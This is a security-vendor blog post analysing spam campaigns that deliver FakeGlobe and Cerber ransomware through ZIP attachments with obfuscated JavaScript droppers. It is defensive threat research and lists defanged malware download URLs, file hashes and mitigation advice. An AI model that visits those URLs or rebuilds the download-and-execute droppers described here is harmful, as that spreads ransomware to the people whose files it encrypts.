CVE-2024-3400: PAN-OS Command Injection Vulnerability in GlobalProtect Gateway. Learn More

CVE-2024-3400: PAN-OS Command Injection Vulnerability in GlobalProtect Gateway. Learn More

Services
Capture
Managed Detection & Response

Eliminate active threats with 24/7 threat detection, investigation, and response.

twi-managed-portal-color
Co-Managed SOC (SIEM)

Maximize your SIEM investment, stop alert fatigue, and enhance your team with hybrid security operations support.

twi-briefcase-color-svg
Advisory & Diagnostics

Advance your cybersecurity program and get expert guidance where you need it most.

tw-laptop-data
Penetration Testing

Test your physical locations and IT infrastructure to shore up weaknesses before exploitation.

twi-database-color-svg
Database Security

Prevent unauthorized access and exceed compliance requirements.

twi-email-color-svg
Email Security

Stop email threats others miss and secure your organization against the #1 ransomware attack vector.

tw-officer
Digital Forensics & Incident Response

Prepare for the inevitable with 24/7 global breach response in-region and available on-site.

tw-network
Firewall & Technology Management

Mitigate risk of a cyberattack with 24/7 incident and health monitoring and the latest threat intelligence.

Solutions
BY TOPIC
Microsoft Exchange Server Attacks
Stay protected against emerging threats
Rapidly Secure New Environments
Security for rapid response situations
Securing the Cloud
Safely navigate and stay protected
Securing the IoT Landscape
Test, monitor and secure network objects
Why Trustwave
About Us
Awards and Accolades
Trustwave SpiderLabs Team
Trustwave Fusion Security Operations Platform
Trustwave Security Colony
Partners
Technology Alliance Partners
Key alliances who align and support our ecosystem of security offerings
Trustwave PartnerOne Program
Join forces with Trustwave to protect against the most advance cybersecurity threats
SpiderLabs Blog

FakeGlobe and Cerber Ransomware: Sneaking under the radar while WeCry

Recently, we observed a constant influx of spam that distributes two ransomware families, perhaps trying to sneak in while everyone is focused with the recent WannaCry malware. Based on data from our Spam Research Database, an email campaign distributing FakeGlobe ransomware started last May 19th and died down on May 21st . But just a couple hours later it was the Cerber ransomware's turn which subsided three days later.

9424_596a85cb-d8bd-42f4-9d80-a8a4108245ff

Figure 1: Volume of FakeGlobe and Cerber related Spam.

The Cerber family started to emerge during the 1st quarter of 2016 and has been seen being distributed via Neutrino or Magnitude exploit kits and spam emails using VBScript files. On the other hand, FakeGlobe ransomware samples were first seen in the last quarter of 2016 via malicious spam and are considered to be closely related to the Globe ransomware families.

This is not a massive campaign, but we did notice almost 31,000 spam emails in our system distributed for both types of malware. While we don't know the botnet origin of these email spams, we can see the majority of the spam originates from Vietnam, India, and Laos. This merely indicates where the compromised computers are located.

8988_44e2502c-db14-4714-96fd-f5105c895753

Figure 2: FakeGlobe and Cerber Spam Origin.

Infection Vector

The email spam related to FakeGlobe and Cerber comes with a ZIP attachment, a blank Subject and does not include any email body.

8575_2fc505c7-973c-4da4-b894-946c11c5b97e

Figure 3: Sample Email

For FakeGlobe, the ZIP will extract an obfuscated JS file and there are two variations. As shown in the figure below, the first variation is encoded using MS Script Encoder which uses unique delimiters (#@~^ and ^#~@). There is an available tool to decode this.

11543_be32b428-aef6-4ff1-ac84-b1c1133f5ca6

Figure 4: MS Encoded Script – FakeGlobe

The second variation uses the eval() and executes both split() and join() functions.

7888_0d72362a-9e20-46c8-855b-58e4eac06e86

Figure 5: Obfuscated Script – FakeGlobe

A classic way to de-obfuscate the code is to write the output of the eval() function into the document stream by using document.write.

11492_bbdd42e9-7f74-4175-8cd6-91c28783ff21

Figure 6: Handling the Obfuscated Script – FakeGlobe

Decoding both of two scripts results in proper JS code which downloads a binary file, uses a random string of digits as a filename and executes it.

10711_95cff713-4d34-4a5e-a6fb-770c8b915bba

Figure 7: Decoded/De-obfuscated Script for FakeGlobe

Download URLs (FakeGlobe):

hxxp://realpolyfv.top/admin.php?f=404

hxxp://realpolyfv.top/admin.php?f=1

hxxp://justgoogkaz.top/admin.php?f=404

Hash Details (FakeGlobe):

MD5: 1BBD2DC9746292C60121865663B287F2

SHA-1: 04644335EF7523274146A4F39AB30621C2A2A9A1

SHA-256: 2815C8CDB02003298F7959FD1CF6EED893DE6652F3861A6A2E3E5744B8AC9234

For the Cerber variants, the ZIP file only holds an obfuscated JS file and decoding it will download a different binary file.

12431_e9ab86d6-d640-4cee-be22-07c440e61094

Figure 8: De-obfuscated Script for Cerber

Download URLs (Ceber):

hxxp://zopoaheika.top/admin.php?f=1

Hash Details (Ceber):

MD5: AE5A348B9DD0AC3A6A46E70C82FA9C38

SHA-1: F440EDC4FE35452D0FBEC35A5C352295F3E3BF0C

SHA-256: 73A7497C8FA283B444242259AE061D5CBB705BE04B5F531F1096A2C236BB5204

Executable Payload

The binary files of both FakeGlobe and Cerber still maintain the same behavior of their previous variants where they encrypt files, with just a few minor changes on the ransom note file. Cerber uses a different filename for its ransom note, _R_E_A_D___T_H_I_S___{random}.html or _R_E_A_D___T_H_I_S___{random}.txt. It retains the same old contents of the ransom note except for the details of its URL payments.

10557_8f6896fa-a7ad-4e13-928f-2c84b2efa569

Figure 9: Cerber's Ransom Note

FakeGlobe still drops how_to_back_files.html but it has changed the details of the email address used to forward the screenshot of the bitcoin payments.

7932_0f44836f-48ec-4371-b883-e40a4da100f5

Conclusion

While everyone is riding the WeCry/WannaCry wave and focused on patching vulnerabilities related to SMB server, FakeGlobe and Cerber ransomware continue a low-profile attack via email. Each of these emails has a unique attachment because of the obfuscated JavaScript code. By the time this script downloads the main ransomware, it is too late. Thus, it is desirable to try and block this at the email gateway.

  • Use an email gateway with multiple layers of protection, including anti-spam, and anti-malware layers with up to date signatures
  • At a policy level, consider blocking inbound *.js files at the email gateway – we are currently seeing many malicious email campaigns that use *.js files

The Trustwave Secure Email Gateway recognizes and blocks this threat campaign.

Latest SpiderLabs Blogs

CVE-2024-3400: PAN-OS Command Injection Vulnerability in GlobalProtect Gateway

Overview A command injection vulnerability has been discovered in the GlobalProtect feature within Palo Alto Networks PAN-OS software for specific versions that have distinct feature configurations...

Read More

CNAPP, CSPM, CIEM, CWPP – Oh My!

We all know the cybersecurity industry loves its acronyms, but just because this fact is widely known doesn’t mean everyone knows the story behind the alphabet soup groups of letters, we must deal...

Read More

Phishing Deception - Suspended Domains Reveal Malicious Payload for Latin American Region

Recently, we observed a phishing campaign targeting the Latin American region. The phishing email contained a ZIP file attachment that when extracted reveals an HTML file that leads to a malicious...

Read More